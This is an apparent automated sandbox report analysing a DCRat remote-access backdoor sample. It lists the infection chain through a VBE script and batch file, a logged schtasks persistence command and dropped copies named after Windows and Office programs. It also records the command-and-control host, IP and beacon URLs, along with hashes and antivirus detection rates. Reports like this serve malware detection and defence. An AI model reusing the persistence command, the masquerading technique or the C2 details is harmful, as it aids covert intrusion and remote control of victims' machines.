            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A0F063 SetUnhandledExceptionFilter,0_2_00A0F063
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A0F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A0F22B
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A1866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A1866F
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A0EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A0EF05
            Source: C:\chainSurrogate\browsersvc.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\chainSurrogate\JOucOkolgtw8nKLZO9UO2eSMaA.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\chainSurrogate\browsersvc.exe "C:\chainSurrogate\browsersvc.exe"Jump to behavior
            Source: C:\chainSurrogate\browsersvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /fJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A0ED5B cpuid 0_2_00A0ED5B
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00A0A63C
            Source: C:\chainSurrogate\browsersvc.exeQueries volume information: C:\chainSurrogate\browsersvc.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeQueries volume information: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A0D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00A0D5D4
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009FACF5 GetVersionExW,0_2_009FACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000004.00000002.1771032686.0000000003283000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.1787477643.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1771032686.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: browsersvc.exe PID: 6544, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UAhpvIJrmb.exe PID: 6884, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000004.00000002.1771032686.0000000003283000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.1787477643.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1771032686.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: browsersvc.exe PID: 6544, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UAhpvIJrmb.exe PID: 6884, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting            		Valid Accounts11
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		11
            Process Injection            		123
            Masquerading            		OS Credential Dumping1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		11
            Scripting            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		LSASS Memory121
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS31
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture113
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information            		Cached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Software Packing            		DCSync37
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1458153 Sample: DFpUKTL6kg.exe Startdate: 17/06/2024 Architecture: WINDOWS Score: 100 45 host1871899.hostland.pro 2->45 49 Found malware configuration 2->49 51 Antivirus detection for dropped file 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 55 11 other signatures 2->55 10 DFpUKTL6kg.exe 3 6 2->10         started        signatures3 process4 file5 41 C:\chainSurrogate\browsersvc.exe, PE32 10->41 dropped 43 C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe, data 10->43 dropped 13 wscript.exe 1 10->13         started        process6 signatures7 65 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->65 16 cmd.exe 1 13->16         started        process8 process9 18 browsersvc.exe 1 22 16->18         started        22 conhost.exe 16->22         started        file10 33 C:\chainSurrogate\UAhpvIJrmb.exe, PE32 18->33 dropped 35 C:\Windows\L2Schemas\OfficeClickToRun.exe, PE32 18->35 dropped 37 C:\Recovery\UAhpvIJrmb.exe, PE32 18->37 dropped 39 6 other malicious files 18->39 dropped 57 Antivirus detection for dropped file 18->57 59 Multi AV Scanner detection for dropped file 18->59 61 Machine Learning detection for dropped file 18->61 63 3 other signatures 18->63 24 UAhpvIJrmb.exe 14 3 18->24         started        27 schtasks.exe 18->27         started        29 schtasks.exe 18->29         started        31 28 other processes 18->31 signatures11 process12 dnsIp13 47 host1871899.hostland.pro 185.26.122.81, 49731, 80 HOSTLANDRU Russian Federation 24->47

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DFpUKTL6kg.exe74%ReversingLabsByteCode-MSIL.Trojan.Uztuby
            DFpUKTL6kg.exe59%VirustotalBrowse
            DFpUKTL6kg.exe100%AviraVBS/Runner.VPG
            DFpUKTL6kg.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\chainSurrogate\browsersvc.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe100%AviraHEUR/AGEN.1323984
            C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe100%AviraVBS/Runner.VPG
            C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe100%AviraHEUR/AGEN.1323984
            C:\Windows\L2Schemas\OfficeClickToRun.exe100%AviraHEUR/AGEN.1323984
            C:\Recovery\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
            C:\chainSurrogate\browsersvc.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe100%Joe Sandbox ML
            C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe100%Joe Sandbox ML
            C:\Windows\L2Schemas\OfficeClickToRun.exe100%Joe Sandbox ML
            C:\Recovery\RuntimeBroker.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe69%VirustotalBrowse
            C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\th\UAhpvIJrmb.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\th\UAhpvIJrmb.exe69%VirustotalBrowse
            C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe69%VirustotalBrowse
            C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe69%VirustotalBrowse
            C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe69%VirustotalBrowse
            C:\Recovery\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Recovery\RuntimeBroker.exe69%VirustotalBrowse
            C:\Recovery\UAhpvIJrmb.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Recovery\UAhpvIJrmb.exe69%VirustotalBrowse
            C:\Windows\L2Schemas\OfficeClickToRun.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Windows\L2Schemas\OfficeClickToRun.exe69%VirustotalBrowse
            C:\chainSurrogate\UAhpvIJrmb.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\chainSurrogate\UAhpvIJrmb.exe69%VirustotalBrowse
            C:\chainSurrogate\browsersvc.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\chainSurrogate\browsersvc.exe69%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            host1871899.hostland.pro2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://host1871899.hostland.pro2%VirustotalBrowse
            http://host1871899.hostland.pro/0%Avira URL Cloudsafe
            http://host1871899.hostland.pro/L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=90%Avira URL Cloudsafe
            http://host1871899.hostland.pro/@==gbJBzYuFDT0%Avira URL Cloudsafe
            http://host1871899.hostland.pro0%Avira URL Cloudsafe
            http://host1871899.hostland.pro/L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60X0%Avira URL Cloudsafe
            http://host1871899.hostland.pro/@==gbJBzYuFDT1%VirustotalBrowse
            http://host1871899.hostland.pro/2%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            host1871899.hostland.pro
            		185.26.122.81
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://host1871899.hostland.pro/L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60Xfalse
            • Avira URL Cloud: safe
            		unknown
            http://host1871899.hostland.pro/@==gbJBzYuFDTtrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://host1871899.hostland.pro/L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=9UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031CF000.00000004.00000800.00020000.00000000.sdmp, UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031F8000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://host1871899.hostland.pro/UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031F8000.00000004.00000800.00020000.00000000.sdmptrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://host1871899.hostland.proUAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031F8000.00000004.00000800.00020000.00000000.sdmptrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebrowsersvc.exe, 00000004.00000002.1771032686.0000000003283000.00000004.00000800.00020000.00000000.sdmp, UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031CF000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            185.26.122.81
            		host1871899.hostland.proRussian Federation
            		62082HOSTLANDRUtrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1458153
            Start date and time:2024-06-17 06:06:07 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 49s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:42
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:DFpUKTL6kg.exe
            renamed because original name is a hash value
            Original Sample Name:23a1767d4e77693bd46f3abfcf10e4d7.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@36/23@1/1
            EGA Information:
            • Successful, ratio: 33.3%
            HCA Information:
            • Successful, ratio: 72%
            • Number of executed functions: 254
            • Number of non-executed functions: 89
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, OfficeClickToRun.exe, RuntimeBroker.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target UAhpvIJrmb.exe, PID 6884 because it is empty
            • Execution Graph export aborted for target browsersvc.exe, PID 6544 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            00:07:08API Interceptor5x Sleep call for process: UAhpvIJrmb.exe modified
            05:07:07Task SchedulerRun new task: dllhost path: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe"
            05:07:08Task SchedulerRun new task: dllhostd path: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe"
            05:07:08Task SchedulerRun new task: OfficeClickToRun path: "C:\Windows\L2Schemas\OfficeClickToRun.exe"
            05:07:08Task SchedulerRun new task: OfficeClickToRunO path: "C:\Windows\L2Schemas\OfficeClickToRun.exe"
            05:07:08Task SchedulerRun new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
            05:07:08Task SchedulerRun new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
            05:07:08Task SchedulerRun new task: UAhpvIJrmb path: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe"
            05:07:08Task SchedulerRun new task: UAhpvIJrmbU path: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe"

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            185.26.122.81yk2Eh24FDd.exeGet hashmaliciousUnknownBrowse
              hT0xyYJthf.exeGet hashmaliciousUnknownBrowse

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                HOSTLANDRUhttp://mydpd.space/Get hashmaliciousDCRat, PureLog StealerBrowse
                • 185.26.122.30
                HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeGet hashmaliciousDCRatBrowse
                • 185.26.122.79
                yk2Eh24FDd.exeGet hashmaliciousUnknownBrowse
                • 185.26.122.81
                hT0xyYJthf.exeGet hashmaliciousUnknownBrowse
                • 185.26.122.81
                https://hideuri.com/EXWJgmGet hashmaliciousUnknownBrowse
                • 185.26.122.79
                rwDENO48jg.elfGet hashmaliciousMirai, MoobotBrowse
                • 185.221.215.184
                i21878JK11.exeGet hashmaliciousDCRatBrowse
                • 185.26.122.80
                i21878JK11.exeGet hashmaliciousDCRatBrowse
                • 185.26.122.80
                Transaccions DOC-REF DX739475.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 185.26.122.9
                2D9643297F94E7AF81915ADAA5F1BA01D2809449B1DE2.exeGet hashmaliciousAzorultBrowse
                • 185.26.122.8

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Program Files (x86)\Internet Explorer\images\1b42ae2595212a

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):41
                Entropy (8bit):4.802554748467756
                Encrypted:false
                SSDEEP:3:4ERz33k3g6nn:4wU3g6nn
                MD5:291639C737510CB6C7D0FA88818E7496
                SHA1:9A905DD7E74E7C336FE94B75B2494AD2EBB115CB
                SHA-256:5515A2F8C55D0C562C224A0774E73646FB9DF0516E7B9EA05081022F03DFA9A0
                SHA-512:179BDC24202C52EA86565E30B4A5CEC11556B76B5DCCE4E0385AB4CD1A4514B04887D9574D089BE691845CA5EE4683082AE16E579A73F55B9991AAB71DFC6596
                Malicious:false
                Preview:49roY0pB3B06jtyrT6yrxPRxHvNi4QpJZaELcoOiC

                C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exe

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\th\1b42ae2595212a

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with very long lines (675), with no line terminators
                Category:dropped
                Size (bytes):675
                Entropy (8bit):5.8772691540168065
                Encrypted:false
                SSDEEP:12:EFeI6feu69D/JXpi18upSJ6yAvEur6NmNaZg9TWZPHKVQKW2wqbjYd41wCGxFod:EFhye15hneEusgM9c3w6jE4
                MD5:AFAD523FA4A2A59BA55EAA96E0848C8D
                SHA1:4C48570FFBB93B5805A0CFF610330669D60CB870
                SHA-256:5FEBD46DEB67D947755F35FE1E9C806D3C686A910770DD50BBFF5E143CFA48A9
                SHA-512:185D7DFA638AAA48C940C60F09943C19667D61B4900A527403DD4B64F081271C7FF81FCBC8F29CC3F7084E0BF27999556E5308216657191701EDA3B323DD677E
                Malicious:false
                Preview:18BoTYe96T9ER5u8KJDMbCQ8nUVmQ58p9GtHrWNQI8nwWpuvm5LCxeNzsDA8C1tAVUEKMnRx6xDdZdm8jk9Vt51f24YoWONQPmbBkki9oYFAauZPaBYb1XRZcjSSOnarkwOwCkY9B9rUz1EIeJNV0vY1VBiBRQvA8YanfnNznYa1q7kleKxFZF1yXXbABXrvOqWbaam05XrcVhKYb7gHdpl2glQIMMxPqonAkIKEi6JBXYd0NCjE1kSjEd4zKdotkbvq3JxSwbjgfjeIIZ5JmsYGWD6GNV3ESZb5nw6EPQSZAvDe8wqvieH1CoT0NqFahfNFIjeVc04Va9Fk9bIaoIfxSk28dG0iL11fi8WZSUSrkvaDjs0viovY9Zxiqg2VAVKiIkCBEsIU0xNgJzZuPFAhGcfJLytwc6rPl259qzrzfbiMMQY0GHF4UmcpE30P9W13F74R4ZEaXKBo3T64Z2pU1w58aP4w8b0JjpGOVH6qDohJlxvu65zGrhCTC50ofRb6U2EONsiS58RMPvXmdK0DltcCnxMZQRLvNlztshhOWhKsQ0DQiOLUbYUkZClagJBowf9o6o46nmqEitwxt51CG1UyQOTq6GsNfg6u1ZU4UPrysQBqPxqkR9i5KKXsUN9g4ciCxB6Uk6s1JfFAMnaIaH5g8BkqBmk

                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\th\UAhpvIJrmb.exe

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 69%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files (x86)\Windows NT\1b42ae2595212a

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:ASCII text, with very long lines (347), with no line terminators
                Category:dropped
                Size (bytes):347
                Entropy (8bit):5.8440607449843505
                Encrypted:false
                SSDEEP:6:dHowpXRcBW9fKyyC2UZQft4t64Q1DvMxPB8yBSc3RQT2y5tZDPEtd3nLPEHIfcvq:dHtpX6BWMUM4tM1DvMxPa3vRDPwXjEQH
                MD5:37F03B5C6EB1975546F54674841D2EF5
                SHA1:3831F53396AF5960377319B2C10D52E68DE1B663
                SHA-256:3B63804A6F56DA8E937382920AF8E20090DCDD5A5DE007A9BE334E5A3BF176C1
                SHA-512:D4A6610F4D27F54F3DBC766DD8C43A9A5AC24E47DDF14FD9CC3BD84DAD9BEC00F308C1DDD09DAF56C102E7B42BAF045C2ED52A60DE1F2D71BC8F2DE0901B6508
                Malicious:false
                Preview:AAJwQJEldULt4BYKu6ctZ80fOMiKQlKjHzt49dsWCUZASDmwKGXisE5CKnhEl4U2KmmESeKRNGrEizNLjvAJNl0D3rtV5ouI9hzqbhep5GUmX0eUaWez4LojvjKluzWjViFAAhuBRUOHQOpDMZ4iJ5Oy3Q41W25GtvQyvdT3mdij6gTg3HYU4xaaUQHum2oYZHXf71RtFB6pXo1W6X8PekL5U0deVjRuyJKyJyjC0pP21vDqYvxO3Z4z6bKGXwXguL0NeCNIy6YzVSEjxxGkvC0ZPV2rncoDRsIp4zMVioa7AEdnXlTkqwurUb7JKffWSVhmKYp7kuCGm3YL1OTCJDXe7aU

                C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe

                Download File
                Process:C:\chainSurrogate\browsersvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):847872
                Entropy (8bit):6.079784675638167
                Encrypted:false
                SSDEEP:12288:avZjFQfgelmX7O7lt3N81zyYj7CNQXgBuJpaAzJWj:OQfgeUO7llNndNogBuHtz4
                MD5:05CF6D069F5B66212AF39C9D6C440CCE
                SHA1:A0BC239516647E46D964F283698AF052CD35BC18
                SHA-256:1481100D64AE0A34FE7D4822C42D4B9E5CE6A870149CEF2CD567E0B655867412
                SHA-512:2F764CA77D1270CB55842371640FE35063452FCE99B16BB8F1AEF6EA6B2561010E231A83679D7B382181A9662B5D26F42523C93E11417E28433457E89556BD9C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 88%
